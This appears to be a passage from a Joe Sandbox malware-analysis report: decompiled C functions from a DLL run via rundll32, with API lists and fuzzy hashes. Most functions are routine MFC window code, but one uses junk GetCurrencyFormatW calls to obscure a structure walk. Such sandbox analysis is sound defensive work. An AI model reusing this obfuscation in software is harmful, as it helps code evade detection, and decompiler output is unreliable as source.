					goto L9;
				} else {
					_t40 = _t33 - 0x1a;
					if(_t40 == 0) {
						_t58 = 0 | E1000BFBD(1, _t66, E1000A8F0(1, _t60, _t71, _t66),  *(_t71 + 0x14),  *(_t71 + 0x14) >> 0x10) == 0x00000000;
						L9:
						if(_t58 != 0) {
							goto L10;
						}
					} else {
						_t43 = _t40 - 0x62;
						if(_t43 == 0) {
							SetWindowLongA(_t66, 0xfffffffc,  *(_t71 - 0x18));
							RemovePropA(_t66, _t68);
							GlobalDeleteAtom(GlobalFindAtomA(_t68));
							goto L10;
						} else {
							if(_t43 != 0x8e) {
								L10:
								 *(_t71 - 0x14) = CallWindowProcA( *(_t71 - 0x18), _t66,  *(_t71 + 0xc),  *(_t71 + 0x10),  *(_t71 + 0x14));
							} else {
								E1000963A(E1000A8F0(1, _t60, _t71, _t66), _t71 - 0x30, _t71 - 0x1c);
								 *(_t71 - 0x14) = CallWindowProcA( *(_t71 - 0x18), _t66, 0x110,  *(_t71 + 0x10),  *(_t71 + 0x14));
								E1000AEC5(1, _t64, _t49, _t71 - 0x30,  *((intOrPtr*)(_t71 - 0x1c)));
							}
						}
					}
				}
				return E1001FC9C( *(_t71 - 0x14));
			}













                                                                                                            0x1000c033
                                                                                                            0x1000c033
                                                                                                            0x1000c033
                                                                                                            0x1000c03a
                                                                                                            0x1000c03f
                                                                                                            0x1000c042
                                                                                                            0x1000c049
                                                                                                            0x1000c04f
                                                                                                            0x1000c053
                                                                                                            0x1000c057
                                                                                                            0x1000c05f
                                                                                                            0x1000c060
                                                                                                            0x1000c063
                                                                                                            0x1000c10c
                                                                                                            0x1000c11e
                                                                                                            0x00000000
                                                                                                            0x1000c069
                                                                                                            0x1000c069
                                                                                                            0x1000c06c
                                                                                                            0x1000c104
                                                                                                            0x1000c123
                                                                                                            0x1000c125
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000c06e
                                                                                                            0x1000c06e
                                                                                                            0x1000c071
                                                                                                            0x1000c0ca
                                                                                                            0x1000c0d2
                                                                                                            0x1000c0e0
                                                                                                            0x00000000
                                                                                                            0x1000c073
                                                                                                            0x1000c078
                                                                                                            0x1000c127
                                                                                                            0x1000c13a
                                                                                                            0x1000c07e
                                                                                                            0x1000c08f
                                                                                                            0x1000c0ac
                                                                                                            0x1000c0b4
                                                                                                            0x1000c0b4
                                                                                                            0x1000c078
                                                                                                            0x1000c071
                                                                                                            0x1000c06c
                                                                                                            0x1000c0c1

                                                                                                            APIs
                                                                                                            • __EH_prolog3_catch.LIBCMT ref: 1000C03A
                                                                                                            • GetPropA.USER32 ref: 1000C049
                                                                                                            • CallWindowProcA.USER32 ref: 1000C0A3
                                                                                                              • Part of subcall function 1000AEC5: GetWindowRect.USER32 ref: 1000AEED
                                                                                                              • Part of subcall function 1000AEC5: GetWindow.USER32(?,00000004), ref: 1000AF0A
                                                                                                            • SetWindowLongA.USER32 ref: 1000C0CA
                                                                                                            • RemovePropA.USER32 ref: 1000C0D2
                                                                                                            • GlobalFindAtomA.KERNEL32(AfxOldWndProc423), ref: 1000C0D9
                                                                                                            • GlobalDeleteAtom.KERNEL32(00000000), ref: 1000C0E0
                                                                                                              • Part of subcall function 1000963A: GetWindowRect.USER32 ref: 10009646
                                                                                                            • CallWindowProcA.USER32 ref: 1000C134
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$AtomCallGlobalProcPropRect$DeleteFindH_prolog3_catchLongRemove
                                                                                                            • String ID: AfxOldWndProc423
                                                                                                            • API String ID: 2702501687-1060338832
                                                                                                            • Opcode ID: 2b9a5534c446d1e2504235bdd7f96beab8017efbdf1b97bda0119f086f5d1bd4
                                                                                                            • Instruction ID: dfbf0fdf7da19c16620821b7241651b8befac12ff30b1409a2a82cb4b6d679a3
                                                                                                            • Opcode Fuzzy Hash: 2b9a5534c446d1e2504235bdd7f96beab8017efbdf1b97bda0119f086f5d1bd4
                                                                                                            • Instruction Fuzzy Hash: 4F31983680021ABFEB02DFA4CD89DFF7A78EF09391F004124F501A5156DB749A51DB61
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10007ECA Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 158COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 97%
                                                                                                            			E10007ECA(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t65;
				signed int _t72;
				signed int _t74;
				struct HWND__* _t75;
				signed int _t78;
				signed int _t95;
				intOrPtr* _t103;
				signed int _t110;
				void* _t124;
				signed int _t129;
				DLGTEMPLATE* _t130;
				struct HWND__* _t131;
				void* _t132;

				_t128 = __esi;
				_t124 = __edx;
				_t104 = __ecx;
				_push(0x3c);
				E1001FBF7(E1003314A, __ebx, __edi, __esi);
				_t103 = __ecx;
				 *((intOrPtr*)(_t132 - 0x20)) = __ecx;
				_t136 =  *(_t132 + 0x10);
				if( *(_t132 + 0x10) == 0) {
					 *(_t132 + 0x10) =  *(E1000EC09(__ecx, 0, __esi, _t136) + 0xc);
				}
				_t129 =  *(E1000EC09(_t103, 0, _t128, _t136) + 0x3c);
				 *(_t132 - 0x28) = _t129;
				 *(_t132 - 0x14) = 0;
				 *(_t132 - 4) = 0;
				E1000D1F4(_t103, _t104, 0, _t129, _t136, 0x10);
				E1000D1F4(_t103, _t104, 0, _t129, _t136, 0x7c000);
				if(_t129 == 0) {
					_t130 =  *(_t132 + 8);
					L7:
					__eflags = _t130;
					if(_t130 == 0) {
						L4:
						_t65 = 0;
						L32:
						return E1001FC9C(_t65);
					}
					E1000424F(_t132 - 0x1c, E1001044F());
					 *(_t132 - 4) = 1;
					 *((intOrPtr*)(_t132 - 0x18)) = 0;
					__eflags = E100123E2(__eflags, _t130, _t132 - 0x1c, _t132 - 0x18);
					__eflags =  *0x1004866c; // 0x0
					_t72 = 0 | __eflags == 0x00000000;
					if(__eflags == 0) {
						L14:
						__eflags = _t72;
						if(__eflags == 0) {
							L17:
							 *(_t103 + 0x44) =  *(_t103 + 0x44) | 0xffffffff;
							 *(_t103 + 0x3c) =  *(_t103 + 0x3c) | 0x00000010;
							E1000C3CA(0, __eflags, _t103);
							_t74 =  *(_t132 + 0xc);
							__eflags = _t74;
							if(_t74 != 0) {
								_t75 =  *(_t74 + 0x20);
							} else {
								_t75 = 0;
							}
							_t131 = CreateDialogIndirectParamA( *(_t132 + 0x10), _t130, _t75, E10007926, 0);
							E10001260( *((intOrPtr*)(_t132 - 0x1c)) + 0xfffffff0, _t124);
							 *(_t132 - 4) =  *(_t132 - 4) | 0xffffffff;
							_t110 =  *(_t132 - 0x28);
							__eflags = _t110;
							if(__eflags != 0) {
								 *((intOrPtr*)( *_t110 + 0x18))(_t132 - 0x48);
								__eflags = _t131;
								if(__eflags != 0) {
									 *((intOrPtr*)( *_t103 + 0x12c))(0);
								}
							}
							_t78 = E1000A998(_t103, 0, __eflags);
							__eflags = _t78;
							if(_t78 == 0) {
								 *((intOrPtr*)( *_t103 + 0x114))();
							}
							__eflags = _t131;
							if(_t131 != 0) {
								__eflags =  *(_t103 + 0x3c) & 0x00000010;
								if(( *(_t103 + 0x3c) & 0x00000010) == 0) {
									DestroyWindow(_t131);
									_t131 = 0;
									__eflags = 0;
								}
							}
							__eflags =  *(_t132 - 0x14);
							if( *(_t132 - 0x14) != 0) {
								GlobalUnlock( *(_t132 - 0x14));
								GlobalFree( *(_t132 - 0x14));
							}
							__eflags = _t131;
							_t59 = _t131 != 0;
							__eflags = _t59;
							_t65 = 0 | _t59;
							goto L32;
						}
						L15:
						E100123AB(_t103, _t132 - 0x38, 0, _t132, _t130);
						 *(_t132 - 4) = 2;
						E10012309(_t132 - 0x38,  *((intOrPtr*)(_t132 - 0x18)));
						 *(_t132 - 0x14) = E10012022(_t132 - 0x38);
						 *(_t132 - 4) = 1;
						E10012014(_t132 - 0x38);
						__eflags =  *(_t132 - 0x14);
						if(__eflags != 0) {
							_t130 = GlobalLock( *(_t132 - 0x14));
						}
						goto L17;
					}
					__eflags = _t72;
					if(_t72 != 0) {
						goto L15;
					}
					__eflags = GetSystemMetrics(0x2a);
					if(__eflags == 0) {
						goto L17;
					}
					_t95 = E10007EA2(_t132 - 0x1c, "MS Shell Dlg");
					__eflags = _t95;
					_t72 = 0 | _t95 == 0x00000000;
					__eflags = _t72;
					if(__eflags == 0) {
						goto L17;
					}
					__eflags =  *((short*)(_t132 - 0x18)) - 8;
					if( *((short*)(_t132 - 0x18)) == 8) {
						 *((intOrPtr*)(_t132 - 0x18)) = 0;
					}
					goto L14;
				}
				_push(_t132 - 0x48);
				if( *((intOrPtr*)( *_t103 + 0x12c))() != 0) {
					_t130 =  *((intOrPtr*)( *_t129 + 0x14))(_t132 - 0x48,  *(_t132 + 8));
					goto L7;
				}
				goto L4;
			}
















                                                                                                            0x10007eca
                                                                                                            0x10007eca
                                                                                                            0x10007eca
                                                                                                            0x10007eca
                                                                                                            0x10007ed1
                                                                                                            0x10007ed6
                                                                                                            0x10007ed8
                                                                                                            0x10007edd
                                                                                                            0x10007ee0
                                                                                                            0x10007eea
                                                                                                            0x10007eea
                                                                                                            0x10007ef2
                                                                                                            0x10007ef7
                                                                                                            0x10007efa
                                                                                                            0x10007efd
                                                                                                            0x10007f00
                                                                                                            0x10007f0a
                                                                                                            0x10007f11
                                                                                                            0x10007f3e
                                                                                                            0x10007f41
                                                                                                            0x10007f41
                                                                                                            0x10007f43
                                                                                                            0x10007f25
                                                                                                            0x10007f25
                                                                                                            0x100080b2
                                                                                                            0x100080b7
                                                                                                            0x100080b7
                                                                                                            0x10007f4e
                                                                                                            0x10007f5c
                                                                                                            0x10007f60
                                                                                                            0x10007f6d
                                                                                                            0x10007f72
                                                                                                            0x10007f78
                                                                                                            0x10007f7a
                                                                                                            0x10007fb0
                                                                                                            0x10007fb0
                                                                                                            0x10007fb2
                                                                                                            0x10007ff3
                                                                                                            0x10007ff3
                                                                                                            0x10007ff7
                                                                                                            0x10007ffc
                                                                                                            0x10008001
                                                                                                            0x10008004
                                                                                                            0x10008006
                                                                                                            0x1000800c
                                                                                                            0x10008008
                                                                                                            0x10008008
                                                                                                            0x10008008
                                                                                                            0x10008026
                                                                                                            0x10008028
                                                                                                            0x1000802d
                                                                                                            0x1000804f
                                                                                                            0x10008052
                                                                                                            0x10008054
                                                                                                            0x1000805c
                                                                                                            0x1000805f
                                                                                                            0x10008061
                                                                                                            0x10008068
                                                                                                            0x10008068
                                                                                                            0x10008061
                                                                                                            0x1000806e
                                                                                                            0x10008073
                                                                                                            0x10008075
                                                                                                            0x1000807b
                                                                                                            0x1000807b
                                                                                                            0x10008081
                                                                                                            0x10008083
                                                                                                            0x10008085
                                                                                                            0x10008089
                                                                                                            0x1000808c
                                                                                                            0x10008092
                                                                                                            0x10008092
                                                                                                            0x10008092
                                                                                                            0x10008089
                                                                                                            0x10008094
                                                                                                            0x10008097
                                                                                                            0x1000809c
                                                                                                            0x100080a5
                                                                                                            0x100080a5
                                                                                                            0x100080ad
                                                                                                            0x100080af
                                                                                                            0x100080af
                                                                                                            0x100080af
                                                                                                            0x00000000
                                                                                                            0x100080af
                                                                                                            0x10007fb4
                                                                                                            0x10007fb8
                                                                                                            0x10007fc3
                                                                                                            0x10007fc7
                                                                                                            0x10007fd7
                                                                                                            0x10007fda
                                                                                                            0x10007fde
                                                                                                            0x10007fe3
                                                                                                            0x10007fe6
                                                                                                            0x10007ff1
                                                                                                            0x10007ff1
                                                                                                            0x00000000
                                                                                                            0x10007fe6
                                                                                                            0x10007f7c
                                                                                                            0x10007f7e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10007f88
                                                                                                            0x10007f8a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10007f94
                                                                                                            0x10007f9b
                                                                                                            0x10007fa0
                                                                                                            0x10007fa2
                                                                                                            0x10007fa4
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10007fa6
                                                                                                            0x10007fab
                                                                                                            0x10007fad
                                                                                                            0x10007fad
                                                                                                            0x00000000
                                                                                                            0x10007fab
                                                                                                            0x10007f18
                                                                                                            0x10007f23
                                                                                                            0x10007f3a
                                                                                                            0x00000000
                                                                                                            0x10007f3a
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • __EH_prolog3_catch.LIBCMT ref: 10007ED1
                                                                                                            • GetSystemMetrics.USER32 ref: 10007F82
                                                                                                            • GlobalLock.KERNEL32 ref: 10007FEB
                                                                                                            • CreateDialogIndirectParamA.USER32(?,?,?,Function_00007926,00000000), ref: 1000801A
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateDialogGlobalH_prolog3_catchIndirectLockMetricsParamSystem
                                                                                                            • String ID: MS Shell Dlg
                                                                                                            • API String ID: 1736106359-76309092
                                                                                                            • Opcode ID: d36f1cedee4abc0f17e012704f78876727180ce03ae2431f8fa6d70f3892889f
                                                                                                            • Instruction ID: 1ea4d1b8922e6c5543e762249093f9d57ee88d3b172a0da63e9484b16312698d
                                                                                                            • Opcode Fuzzy Hash: d36f1cedee4abc0f17e012704f78876727180ce03ae2431f8fa6d70f3892889f
                                                                                                            • Instruction Fuzzy Hash: AF51DD30D0020A9FEB11DBA4CC859EEBBB0FF44380F214568F545EB19ADB349E85CBA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10001534 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 108COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10001534(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, signed int _a12, signed int _a16, signed int _a20, intOrPtr _a24) {
				signed int _t22;
				signed int _t45;
				void* _t50;
				void* _t51;
				intOrPtr _t55;
				intOrPtr* _t64;
				void* _t73;

				_t51 = __ecx;
				_t45 = _a16 * _a20;
				_t22 = GetCurrencyFormatW(0, 0x11d4, L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD", 0, L"xadqsavcbdfewescGADW", 0x22b9);
				_t55 = _a4;
				_a16 = E100014F4(_t51) + _t22 * (_t45 - _a12 + _t55 + _a8) *  *0x100440d4 * 0x34;
				_a12 = _t55 - _t45 - _a12 + _a8;
				_t73 = GetCurrencyFormatW(0, 0x11d4, L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD", 0, L"xadqsavcbdfewescGADW", 0x22b9) * _a12 *  *0x100440cc * 0x24 +  *((intOrPtr*)(_a16 + 0xc));
				_t50 = GetCurrencyFormatW(0, 0x11d4, L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD", 0, L"xadqsavcbdfewescGADW", 0x22b9) * _a12 *  *0x100440e0 +  *((intOrPtr*)(_t73 + 0xc));
				_t64 = GetCurrencyFormatW(0, 0x11d4, L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD", 0, L"xadqsavcbdfewescGADW", 0x22b9) * _a12 *  *0x100440d4 * 0x48 +  *((intOrPtr*)(_t73 + 0xc));
				while(E10001395( *((intOrPtr*)(_t64 + 0x30)) + GetCurrencyFormatW(0, 0x11d4, L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD", 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440dc * 2, _a24) != 0) {
					_t64 = GetCurrencyFormatW(0, 0x11d4, L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD", 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440dc * 0x48 +  *_t64;
					if(_t64 != _t50) {
						continue;
					}
					return 0;
				}
				return  *((intOrPtr*)(_t64 + 0x18));
			}










                                                                                                            0x10001534
                                                                                                            0x10001539
                                                                                                            0x1000155f
                                                                                                            0x10001561
                                                                                                            0x10001598
                                                                                                            0x100015a9
                                                                                                            0x100015cc
                                                                                                            0x100015ef
                                                                                                            0x10001619
                                                                                                            0x1000161c
                                                                                                            0x10001676
                                                                                                            0x1000167a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000167c
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 1000155F
                                                                                                              • Part of subcall function 100014F4: GetCurrencyFormatW.KERNEL32 ref: 10001512
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 100015B5
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 100015DF
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10001606
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10001639
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10001668
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrencyFormat
                                                                                                            • String ID: eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$xadqsavcbdfewescGADW
                                                                                                            • API String ID: 3383288267-3161301136
                                                                                                            • Opcode ID: 5189b181ffaafe6b9c05ca24a10a3e20f9d538d3ca2e5d5b4c785eae2a339ca0
                                                                                                            • Instruction ID: 4961d4481171c5eb7b22e17488040c19a8d80f5034832b3bd1fa6cad81c8b5c3
                                                                                                            • Opcode Fuzzy Hash: 5189b181ffaafe6b9c05ca24a10a3e20f9d538d3ca2e5d5b4c785eae2a339ca0
                                                                                                            • Instruction Fuzzy Hash: 52319D73644215BFE204CB55CD82F86FBA9EB9A751F06401AF704BF5D1CB30A8548EA8
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10004C30 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 88windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 69%
                                                                                                            			E10004C30(void* __edx, void* __eflags) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t19;
				void* _t38;
				void* _t43;
				void* _t51;
				void* _t52;
				void* _t53;
				long* _t54;
				void* _t58;
				CHAR* _t63;
				signed int _t64;
				void* _t66;

				_t66 = __eflags;
				_t51 = __edx;
				_push(0xffffffff);
				_push(E10032E77);
				_push( *[fs:0x0]);
				_push(_t43);
				_push(_t38);
				_push(_t52);
				_t19 =  *0x10045580; // 0x6a53a566
				_push(_t19 ^ _t64);
				 *[fs:0x0] = _t64 + 0x18;
				_t58 = _t43;
				E10007D6C(_t38, _t43, _t52);
				_push(GetSystemMenu( *(_t58 + 0x20), 0));
				_t53 = E1000ED5E(0, _t43, _t52, _t58, _t66);
				if(_t53 != 0) {
					E1000424F(_t64 + 0x18, E1001044F());
					 *((intOrPtr*)(_t64 + 0x24)) = 0;
					E10004C10(_t64 + 0x18, 0x65);
					_t63 =  *(_t64 + 0x14);
					if( *((intOrPtr*)(_t63 - 0xc)) != 0) {
						AppendMenuA( *(_t53 + 4), 0x800, 0, 0);
						AppendMenuA( *(_t53 + 4), 0, 0x10, _t63);
					}
					 *(_t64 + 0x20) =  *(_t64 + 0x20) | 0xffffffff;
					E10001260(_t63 - 0x10, _t51);
				}
				_t54 = _t58 + 0x11c;
				SendMessageA( *(_t58 + 0x20), 0x80, 1,  *_t54);
				SendMessageA( *(_t58 + 0x20), 0x80, 0,  *_t54);
				E1000EE6D(_t58, 0x3e9, "Hola Mundo");
				E1000EE6D(_t58, 0x3ea, "Hola Mundo");
				SendMessageA( *(_t58 + 0xe8), 0x143, 0, "Hola");
				 *[fs:0x0] =  *((intOrPtr*)(_t64 + 0x18));
				return 1;
			}



















                                                                                                            0x10004c30
                                                                                                            0x10004c30
                                                                                                            0x10004c30
                                                                                                            0x10004c32
                                                                                                            0x10004c3d
                                                                                                            0x10004c3e
                                                                                                            0x10004c3f
                                                                                                            0x10004c42
                                                                                                            0x10004c43
                                                                                                            0x10004c4a
                                                                                                            0x10004c4f
                                                                                                            0x10004c55
                                                                                                            0x10004c57
                                                                                                            0x10004c68
                                                                                                            0x10004c6e
                                                                                                            0x10004c72
                                                                                                            0x10004c7e
                                                                                                            0x10004c89
                                                                                                            0x10004c8d
                                                                                                            0x10004c92
                                                                                                            0x10004c99
                                                                                                            0x10004cab
                                                                                                            0x10004cb5
                                                                                                            0x10004cb5
                                                                                                            0x10004cb7
                                                                                                            0x10004cbf
                                                                                                            0x10004cbf
                                                                                                            0x10004cca
                                                                                                            0x10004cdd
                                                                                                            0x10004ce7
                                                                                                            0x10004cf6
                                                                                                            0x10004d03
                                                                                                            0x10004d1a
                                                                                                            0x10004d23
                                                                                                            0x10004d32

                                                                                                            APIs
                                                                                                            • GetSystemMenu.USER32(?,00000000,6A53A566,?,?,?,?,?,?,10032E77,000000FF), ref: 10004C62
                                                                                                            • AppendMenuA.USER32 ref: 10004CAB
                                                                                                            • AppendMenuA.USER32 ref: 10004CB5
                                                                                                            • SendMessageA.USER32(?,00000080,00000001,?), ref: 10004CDD
                                                                                                            • SendMessageA.USER32(?,00000080,00000000,?), ref: 10004CE7
                                                                                                            • SendMessageA.USER32(?,00000143,00000000,Hola), ref: 10004D1A
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MenuMessageSend$Append$System
                                                                                                            • String ID: Hola$Hola Mundo
                                                                                                            • API String ID: 1041970973-3638179569
                                                                                                            • Opcode ID: e34ef31d9de0c10b9e087c5bcc9f0d31551c493d279669179a5a011054600792
                                                                                                            • Instruction ID: b3705290631e1be327c95a3509f9ae24e9e58cb89a542e4eda3f4c22a02a2666
                                                                                                            • Opcode Fuzzy Hash: e34ef31d9de0c10b9e087c5bcc9f0d31551c493d279669179a5a011054600792
                                                                                                            • Instruction Fuzzy Hash: 4521E571600744BFE711DB20CC82F6BB7A9FB49B90F004A29F255A61E1DB36BD04CB65
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10012309 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 63COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 95%
                                                                                                            			E10012309(intOrPtr __ecx, signed int _a4) {
				signed int _v8;
				char _v40;
				void _v68;
				intOrPtr _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t12;
				void* _t14;
				char* _t23;
				void* _t29;
				signed short _t30;
				struct HDC__* _t31;
				signed int _t32;

				_t12 =  *0x10045580; // 0x6a53a566
				_v8 = _t12 ^ _t32;
				_t31 = GetStockObject;
				_t30 = 0xa;
				_v72 = __ecx;
				_t23 = "System";
				_t14 = GetStockObject(0x11);
				if(_t14 != 0) {
					L2:
					if(GetObjectA(_t14, 0x3c,  &_v68) != 0) {
						_t23 =  &_v40;
						_t31 = GetDC(0);
						if(_v68 < 0) {
							_v68 =  ~_v68;
						}
						_t30 = MulDiv(_v68, 0x48, GetDeviceCaps(_t31, 0x5a)) & 0x0000ffff;
						ReleaseDC(0, _t31);
					}
					L6:
					_t16 = _a4;
					if(_a4 == 0) {
						_t16 = _t30 & 0x0000ffff;
					}
					return E1001FBB5(E100121BA(_t23, _v72, _t29, _t31, _t23, _t16), _t23, _v8 ^ _t32, _t29, _t30, _t31);
				}
				_t14 = GetStockObject(0xd);
				if(_t14 == 0) {
					goto L6;
				}
				goto L2;
			}

















                                                                                                            0x1001230f
                                                                                                            0x10012316
                                                                                                            0x1001231b
                                                                                                            0x10012324
                                                                                                            0x10012327
                                                                                                            0x1001232a
                                                                                                            0x1001232f
                                                                                                            0x10012333
                                                                                                            0x1001233d
                                                                                                            0x1001234c
                                                                                                            0x10012350
                                                                                                            0x1001235d
                                                                                                            0x1001235f
                                                                                                            0x10012361
                                                                                                            0x10012361
                                                                                                            0x1001237c
                                                                                                            0x1001237f
                                                                                                            0x1001237f
                                                                                                            0x10012385
                                                                                                            0x10012385
                                                                                                            0x1001238b
                                                                                                            0x1001238d
                                                                                                            0x1001238d
                                                                                                            0x100123a8
                                                                                                            0x100123a8
                                                                                                            0x10012337
                                                                                                            0x1001233b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • GetStockObject.GDI32(00000011), ref: 1001232F
                                                                                                            • GetStockObject.GDI32(0000000D), ref: 10012337
                                                                                                            • GetObjectA.GDI32(00000000,0000003C,?), ref: 10012344
                                                                                                            • GetDC.USER32(00000000), ref: 10012353
                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 10012367
                                                                                                            • MulDiv.KERNEL32(00000000,00000048,00000000), ref: 10012373
